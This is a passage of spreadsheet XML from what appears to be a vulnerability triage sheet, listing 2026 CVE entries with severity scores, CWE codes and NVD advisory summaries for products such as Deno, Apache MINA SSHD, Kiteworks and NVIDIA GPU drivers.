      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103432</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>apcupsd through 3.14.14 has an sscanf stack-based buffer overflow in getupsvar() in src/cgi/upsfetch.c (used by upsstats.cgi, multimon.cgi, and upsfstats.cgi), a related issue to CVE-2026-15544.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103432</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103473</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Deno versions 2.7.0 through 2.9.7 on Windows contain a command injection vulnerability in node:child_process where shell arguments are escaped for the wrong shell type. Attackers can inject OS commands by passing untrusted arguments with the shell option, allowing arbitrary command execution with Deno process privileges.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103473</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51568</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr"/>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>modelscope Agentscope v1.0.18-v1.0.0 is vulnerable to Path Traversal in write_text_file.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51568</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51570</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr"/>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>modelscope Agentscope v1.0.0-v1.0.8 is vulnerable to Path Traversal in insert_text_file.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51570</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87004</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>docker, gin</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.31.3, when the OIDC login flow completes, backend/modules/auth/providers/auth_oidc_provider.py decodes the id_token returned by the identity provider's token endpoint using jose.jwt.get_unverified_claims() instead of jwt.decode(). This skips signature verification, audience (aud) validation, issuer (iss) validation, and expiry (exp) checking entirely. The extracted claims (email/sub/preferred_username) are then used directly as the user_id for the resulting Tugtainer session. This issue has been patched in version 1.31.3.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87004</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93994</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-304</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>Apache MINA SSHD is a Java library for client-side and server-side SSH. SSH servers can be configured to require multi-authentication schemes, for instance two different public keys, not just one. In OpenSSH, this would be done by setting in sshd_config AuthenticationMethods "publickey,publickey". Apache MINA SSHD provides an equivalent configuration mechanism.
In Apache MINA SSHD versions up to 2.19.0 and 3.0.0-M1 to 3.0.0-M5 the server code in component sshd-core does not enforce that the two public keys presented are different. A user can thus successfully authenticate with only one of the two key pairs required by presenting this single key twice. This is a partial authentication bypass.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93994</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100256</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.3 rCE via Structural Search script constraints was possible in untrusted projects</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100256</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101885</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>ZeroClaw versions before 0.8.5 built with plugins-wasm feature contain a path traversal vulnerability in plugin installation that fails to validate the wasm_path manifest field. Attackers can convince users to install crafted plugins that write arbitrary files to paths outside the plugins directory, such as shell startup files, enabling code execution.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101885</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102112</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-78</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Kiteworks could allow an attacker who has already obtained code execution as an unprivileged backend service account on the appliance to escalate to root and run arbitrary commands with the highest privileges. Exploitation requires existing local access to that service account.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102112</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102113</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-59</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Kiteworks could allow an attacker who has already obtained code execution as an unprivileged backend service account on the appliance to escalate to root. A privileged routine did not safely handle a filesystem path that the lower-privileged account could influence, allowing the attacker to cause a root-owned operation to run arbitrary commands with the highest privileges. Exploitation requires existing local access to that service account.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102113</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102118</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-250, CWE-59</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability in Kiteworks could have allowed an attacker with an existing shell under a low-privileged service account to escalate to root privileges on the appliance.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102118</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47489</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where permissions on read-only memory might not be preserved. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47489</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47491</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-404</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user can cause improper release of memory resources, leaving a mapping accessible after the underlying memory is reused. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47491</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47493</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU software for Windows and Linux contains a vulnerability in the GPU kernel driver where a guest may access privileged host GPU resources for which it is not authorized. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47493</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47494</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability where a user might be able to cause a format string issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47494</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47495</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager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143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47495</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47497</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
